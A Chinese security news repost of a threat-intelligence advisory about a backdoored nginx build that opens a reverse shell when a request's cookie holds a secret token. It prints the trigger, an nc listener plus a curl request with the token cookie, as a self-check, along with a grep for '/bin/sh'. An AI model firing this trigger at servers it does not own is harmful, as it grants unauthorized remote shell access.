请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册

QQ登录

只需一步,快速开始

首页 资讯 行业热点 查看内容

警惕新型nginx后门,目前全杀毒软件免杀

指尖安全-小胖 2020-7-16 20:06

情报来源:安恒威胁情报中心

概述

近日,我们捕获一个新型nginx后门,该后门免杀效果非常好,截至目前VT上所有杀毒软件都不能对其进行查杀。

经过安恒威胁情报中心的研究员分析,发现黑客修改了原版nginx中处理http头的函数ngx_http_header_filter

黑客针对cookies字段进行了特殊处理,判断请求中是否包含“lkfakjf”,

如果包含,则会主动回连黑客给定的服务器地址。笔者分析逻辑后,构造了POC实现了反弹shell功能如下:

网络验证后门方法:

首先通过nc本地监听9999端口:

$ nc -lv 9999

接着使用curl带上特殊cookie对本地地址发起请求:

$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"

如果在监听端口得到shell,说明服务器的nginx已经被黑客替换。

本地验证后门方法:

通过grep命令判断当前运行对nginx里面是否存在”/bin/sh”可疑字符串

$ which nginx |xargs grep "/bin/sh" -la

失陷指标(IOC):

原文链接:https://ti.dbappsecurity.com.cn/informationDetail?id=947

分享到
文章点评